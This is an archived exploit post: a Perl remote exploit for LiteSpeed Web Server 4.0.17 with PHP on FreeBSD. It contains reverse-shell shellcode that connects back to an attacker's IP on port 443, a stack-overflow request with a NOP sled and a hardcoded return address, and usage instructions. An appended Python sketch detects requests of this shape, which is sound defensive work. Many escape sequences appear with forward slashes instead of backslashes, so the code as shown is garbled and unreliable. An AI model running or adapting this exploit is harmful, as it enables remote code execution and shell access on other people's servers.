LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
2011-04-29 01:49
Archived as a backup copy.
# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
# bug discovered & exploited by Kingcope
#
# Dec 2010
# Lame Xploit Tested with success on
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
# FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15 Standard x86
# can be used against the admin interface (port 7080), too
# Xploit only works on default lsphp binary not the compiled version
#
# this should be exploitable on linux too (on the compiled SAPI version)
# the shipped linux version of lsphp has stack cookies enabled,
# which could be brute forced if there wasn't a null put at the end of
# the exploit buffer. The compiled SAPI version is exploitable, but then
# the offsets differ from box to box, so this time FreeBSD targets only.
# thus on linux this is very tricky to exploit.
# this is a proof of concept, don't try this on real boxes
# see lsapilib.c line 1240 (http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz)

use IO::Socket;

$|=1;

#freebsd reverse shell port 443
#setup a netcat on this port ^^
$bsdcbsc =
# setreuid, no root here
"/x31/xc0/x31/xc0/x50/x31/xc0/x50/xb0/x7e/x50/xcd/x80".
# connect back :>
"/x31/xc0/x31/xdb/x53/xb3/x06/x53".
"/xb3/x01/x53/xb3/x02/x53/x54/xb0".
"/x61/xcd/x80/x31/xd2/x52/x52/x68".
"/x41/x41/x41/x41/x66/x68/x01/xbb".
"/xb7/x02/x66/x53/x89/xe1/xb2/x10".
"/x52/x51/x50/x52/x89/xc2/x31/xc0".
"/xb0/x62/xcd/x80/x31/xdb/x39/xc3".
"/x74/x06/x31/xc0/xb0/x01/xcd/x80".
"/x31/xc0/x50/x52/x50/xb0/x5a/xcd".
"/x80/x31/xc0/x31/xdb/x43/x53/x52".
"/x50/xb0/x5a/xcd/x80/x31/xc0/x43".
"/x53/x52/x50/xb0/x5a/xcd/x80/x31".
"/xc0/x50/x68/x2f/x2f/x73/x68/x68".
"/x2f/x62/x69/x6e/x89/xe3/x50/x54".
"/x53/x50/xb0/x3b/xcd/x80/x31/xc0".
"/xb0/x01/xcd/x80";

sub usage() {
    print "written by kingcope/n";
    print "usage:/n".
          "litespeed-remote.pl <target ip/host> <target port> <your ip> <php file on remote host>/n/n".
          "example:/n".
          "perl litespeed-remote.pl 192.168.2.3 8088 192.168.2.2 phpinfo.php/n/n";
    exit;
}

if($#ARGV ne 3) { usage; }

$target = $ARGV[0];
$port = $ARGV[1];
$cbip = $ARGV[2];
$file = $ARGV[3];

($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);

#my $sock = IO::Socket::INET->new(PeerAddr => $target,
#                                 PeerPort => 8088,
#                                 Proto => 'tcp');
#$a = "A" x 500;
#print $sock "POST /phpinfo.php HTTP/1.1/r/nHost: 192.168.2.5/r/n/r/n";
#$x = <stdin>;

#$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE
#$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE
$ret = pack("V", 0x080F40CD); # JMP EDX lsphp

my $sock = IO::Socket::INET->new(PeerAddr => $target,
                                 PeerPort => $port,
                                 Proto => 'tcp');

$a = "A"x 263 . "AAAA"x 6 . $ret . "C"x 500;
$sc = "/x90"x 3000 . $bsdcbsc;

print $sock "POST //x90/x90/x90/x90/x90/x90/xeb/x50/../$file? HTTP/1.1/r/nHost: $target/r/nVVVV: $sc/r/n$a KINGCOPEH4XXU:/r/n/r/n";

while(<$sock>) {
    print;
}
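The request built by the script above has a distinctive shape: raw high bytes and a `/../` segment in the request target, a multi-kilobyte header value made of one repeated byte, and a header line whose name is not a valid token. The following detection sketch is an added example, not part of the original post or of LiteSpeed; the function names, the thresholds and both sample requests are assumptions constructed for illustration.

```python
import re

MAX_HEADER_LINE = 512   # assumed limit; tune to your own traffic
MAX_RUN = 64            # assumed limit for one byte value repeated back to back
TOKEN = re.compile(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")  # RFC 7230 header-name chars

def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte value."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best

def inspect_request(raw: bytes) -> list[str]:
    """Return the names of the checks a raw HTTP request head fails."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    findings = []
    parts = lines[0].split(b" ")
    target = parts[1] if len(parts) == 3 else b""
    if len(parts) != 3:
        findings.append("malformed-request-line")
    if any(b < 0x21 or b > 0x7E for b in target):
        findings.append("non-ascii-request-target")
    if b"/../" in target:
        findings.append("dot-dot-segment")
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep or not TOKEN.fullmatch(name):
            findings.append("invalid-header-name")
        if len(line) > MAX_HEADER_LINE:
            findings.append("oversized-header-line")
        if longest_run(value) > MAX_RUN:
            findings.append("repeated-byte-run")
    return sorted(set(findings))

# Constructed samples: filler bytes only, no payload.
SUSPICIOUS = (b"POST /\x90\x90\x90\x90/../phpinfo.php? HTTP/1.1\r\n"
              b"Host: 192.0.2.10\r\n"
              b"VVVV: " + b"\x90" * 3000 + b"\r\n" +
              b"A" * 600 + b" X-FILLER:\r\n\r\n")
BENIGN = (b"POST /phpinfo.php HTTP/1.1\r\nHost: 192.0.2.10\r\n"
          b"Content-Length: 0\r\n\r\n")
```

The same checks can be enforced at a reverse proxy or WAF in front of the server by rejecting requests that exceed header-size limits or carry non-ASCII bytes in the request line.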